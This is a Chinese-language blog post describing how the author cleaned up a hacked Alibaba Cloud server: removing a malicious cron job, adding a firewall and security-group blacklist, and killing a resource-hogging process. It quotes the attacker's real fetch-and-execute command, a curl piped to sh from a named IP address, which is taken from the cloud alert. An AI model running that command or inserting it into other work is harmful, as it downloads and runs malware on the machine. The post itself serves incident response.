记一次阿里云黑客攻击事件

最新推荐文章于 2024-05-11 07:13:15 发布
最新推荐文章于 2024-05-11 07:13:15 发布
阅读量8.8k 收藏 3
点赞数 8
分类专栏: 阿里云 网络安全 文章标签: 阿里云 防火墙 黑客攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012259256/article/details/79840356
版权

这几天服务器一直发生异常行为,阿里云报警如下:



根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件

访问这个地址:http://165.225.157.157:8000/i.sh

看到执行语句如下:


大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定时任务crontab,还生成了ddgs.3010文件不断后台执行。

So,第一步,查看crontab -l ,果然有


那么显而易见,执行:crontab -r 删除掉cron任务。

第二步,安装firewall,具体操作,参考我的另外一篇博客:https://blog.csdn.net/u012259256/article/details/61018892

限制固定的访问端口:


第三步,其实阿里云后台提供了安全组策略,可以完成防火墙的功能,而且更加方便配置,配置如下(并且把165.225.157.157加入黑名单,不允许访问):



第四步,kill掉这些恶毒的进程,MD

用top命令,实时查看进程占用情况


(PS:因为进程已经被我kill掉,所以看不到数据啦)

没有kill之前,有一个恶意进程CPU占用198%,还有ddgs.3010进程,一直后台运行。总之,找到PID,然后kill就可以!

---------------------------------------------

总结:买了服务器一定记得先安装防火墙,或者设置安全策略!



Yeager

钠离子zi
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
阿里云DDos&WAF 紧急处理流程
修电脑的码农
08-05 3998
高防IP紧急处理 4层攻击 一、解除黑洞 DDoS高防IP服务提供对进入黑洞的高防IP实例中部分线路的高防IP进行解封的功能,即您可以自行针对某条被黑洞的高防线路的高防IP进行解封操作。 说明: * 每个高防IP服务用户每天拥有三次黑洞解封机会,超过三次后将无法进行解封操作。系统将在每天零点时重置黑洞解封次数,当天未使用的解封次数不会累计到下一天。 * BGP线路暂不支持黑洞解...
云数据库被黑客攻击
weixin_46822367的博客
03-29 8506
云数据库被黑客攻击
2024年最全盘点世界十大著名黑客攻击事件_十大网络安全事件,你还看不懂吗
最新发布
2401_84545908的博客
05-11 900
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
阿里云被攻击的处理方法
xyyaq的博客
04-01 5018
现在云服务器非常普遍,当下最多用到的就是阿里云、华为云、腾讯云等云服务器 但是如果我们在使用服务器的过程当中碰到黑客的DDOS攻击,我们应当怎么处理呢? 下面就以阿里云被攻击为例子给大家举例: 当我们的阿里云服务器受到攻击的时候我们的绑定手机会收到短信 当我们收到这个短信的时候,如果是第一次碰到难免心里会惊慌失措,但是大家不要着急,因为在很多时候我们的云服务器本身只有默认5G的防护值,很容易就超过防护阈值,导致我们的业务宕机,一旦业务宕机直接影响到的就是我们的团队以及市场运营,所以怎么样去解
阿里云服务器安全知识:服务器被黑客攻击?或许这些行为你从未在意过 ...
weixin_34146805的博客
02-25 1000
随着互联网技术的发展,技术的透明化,服务器系统漏洞百出,黑客充分利用,居多重要数据被盗,或破坏,正是如此,需要加强我们的安全意识,以防网站、系统等重要数据被盗。服务器重要设置事项(windows篇): 1、系统盘和站点放置盘必须设置为NTFS格式,方便设置权限。 2、系统盘和站点放置盘除administrators 和system的用户权限全部去除。 3...
命令中/bin/sh -c 参数
热门推荐
qq_44792624的博客
07-07 2万+
/bin/sh -c的必要性 引用: https://blog.csdn.net/qq_34562093/article/details/89948303 用法 一、 比如要向 test.asc 文件中随便写入点内容,可以: $ echo “信息” >> test.csv 如果将 test.asc 权限设置为只有 root 用户才有权限进行写操作: $ sudo chown root.root test.csv 然后,我们使用 sudo 并配合 echo 命令再次向修改权限之后的 test.as
阿里云短信云平台发送短信
04-25
阿里云短信服务提供了多种发送方式,包括 API 接口、SDK 等。其中,API 接口是最常用的方式之一,它可以通过 HTTP/HTTPS 协议进行调用,使用简单、灵活。开发者只需要通过阿里云的控制台获取 AccessKey 和 SecretKey...
阿里云生活物联网平台开发云智能app
04-09
基于mqtt协议,使用阿里云生活物联网平台制作云智能app,满足使用应用层的要求
阿里云产品图标 icon
05-10
每个图标都代表着阿里云生态中的一个重要组成部分,帮助用户在阿里云的广阔服务目录中迅速找到所需。 总之,阿里云的图标集是其产品和服务的视觉语言,它们以简洁、直观的方式传达了复杂的IT概念。通过亿图图示提供...
esp32通过mqtt协议连接阿里云
09-23
ESP32通过MQTT协议连接阿里云是一种常见的物联网(IoT)应用场景,它允许ESP32微控制器与阿里云物联网平台进行实时数据交互。在这个过程中,ESP32首先需要连接到WiFi网络,然后通过MQTT(Message Queuing Telemetry ...
C#阿里云mqtt连接
07-10
此程序为C#编写,编写编译环境VS2019,主要作用为以mqtt方式连接阿里云物联网平台,程序中需要修改的位置已经注释,自行修改以后可以直接使用,在连接阿里云平台时会出现一个警告说是“输入的字符格式错误”,虽说不...
盘点世界十大著名黑客攻击事件
2201_75362610的博客
03-10 7275
为什么把熊猫烧香病毒放在最后呢,因为小编对对熊猫烧香病毒体会最深,相信在2006年-2007年初玩电脑的人都会得一个名为“熊猫烧香”的病毒,2007年1月初开始肆虐网络,它主要通过下载的档案传染,受到感染的机器文件因为被误携带间接对其它 计算机程序、系统破坏严重。该病毒在很短的时间内就袭击了全球无以数计的电脑,并且,它还是个很挑食的病毒,专喜欢那些具有高价值IT资源的电脑系统:比如美国国安部门、CIA、英国国会等政府机构、股票经纪及那些著名的跨国公司等。知识,对于网络已经很依赖的你是非常有裨益的。
【盘点世界十大著名黑客攻击事件
Technology_77的博客
09-06 895
为什么把熊猫烧香病毒放在最后呢,因为小编对对熊猫烧香病毒体会最深,相信在2006年-2007年初玩电脑的人都会得一个名为“熊猫烧香”的病毒,2007年1月初开始肆虐网络,它主要通过下载的档案传染,受到感染的机器文件因为被误携带间接对其它 计算机程序、系统破坏严重。直到1999年3月,梅利莎登上了全球报纸的头版。该病毒在很短的时间内就袭击了全球无以数计的电脑,并且,它还是个很挑食的病毒,专喜欢那些具有高价值IT资源的电脑系统:比如美国国安部门、CIA、英国国会等政府机构、股票经纪及那些著名的跨国公司等。
盘点史上最严重的五大黑客攻击事件
VN520的博客
03-10 1626
黑客攻击事件频频发生 数据安全越发重要索尼旗下PlayStation Network平台又遭黑客入侵,数百万用户的姓名、住址、账号密码等信息遭窃。这一消息被曝光以后,科技界再次聚焦互联网安全这个异常棘手但至关重要的话题。黑客入侵电脑网络并窃取用户数据并不是什么新鲜事,从电脑网络问世至今,或许几乎每天都在发生。然而,随着网民数量不断增加,越来越敏感的数据保存在电脑之上,数据安全问题变得愈发重要。这些数据库通常极为安全,对于黑客来说,用户姓名、电子邮件地址、信用卡信息都相当值钱,为了获取这些信息,他们可以不择手
实现http请求的几种方式/curl/urllib
程序的尽头是数学,一日不推导赶不上买买提
08-22 831
1 //简单的post请求 curl -d '{"key","value"}' https://xxx.xxx.com 2 //稍微复杂一点的post请求 curl -H 'Accept:application/json' -H 'charset:utf-8' -H 'X-Auth-Appid:10086' -H 'X-Auth-TimeS
Linux Shell脚本编程--curl命令详解
844604778
08-25 5756
用途说明 curl命令是一个功能强大的网络工具,它能够通过http、ftp等方式下载文件,也能够上传文件。其实curl远不止前面所说的那些功能,大家可以通过man curl阅读手册页获取更多的信息。类似的工具还有wget。 curl命令使用了libcurl库来实现,libcurl库常用在C程序中用来处理HTTP请求,curlpp是libcurl的一个C++封装,这几个东西可以用在抓取网页、网络...
臭名昭著的黑客攻击事件 20件
MAGANG255的博客
04-24 1万+
史上最臭名昭著的20次网络攻击 2015-8-29 22:12:56来源:雷锋网作者:老吕IO责编:汐元 评论:135               网络世界的冲突是真实世界的延续,所以网络世界和真实世界一样险象环生,充满了理念不合、利益冲突、政治攻击甚至战争。今天就让我们来盘点一下21世纪以来最臭名昭著的20
一次阿里云ECS服务器图片资源迁移至 阿里云 oss
05-27
好的,您可以先登录阿里云ECS服务器,然后安装OSS工具包,可以使用以下命令: ``` sudo apt-get update sudo apt-get install ossfs ``` 接下来,您需要在阿里云OSS中创建一个Bucket,并且获取您的Access Key ID和Access Key Secret。 然后,您需要使用以下命令来mount OSS到您的ECS服务器: ``` ossfs bucket-name /mnt/oss -ourl=oss-cn-hangzhou.aliyuncs.com -o nonempty ``` 在这个命令中,"bucket-name"是您创建的Bucket的名称,"/mnt/oss"是您将要mount的本地目录,"-ourl"是您的OSS endpoint,"-o nonempty"用于指定如果本地目录已经存在文件,则不要清空。 最后,您可以使用以下命令将您的图片资源从ECS服务器迁移到OSS: ``` cp -r /your/local/image/dir /mnt/oss ``` 这将会将您本地的图片资源复制到/mnt/oss目录中,由于ossfs已经mount了您的Bucket,因此这些图片资源将会自动同步到您的OSS中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值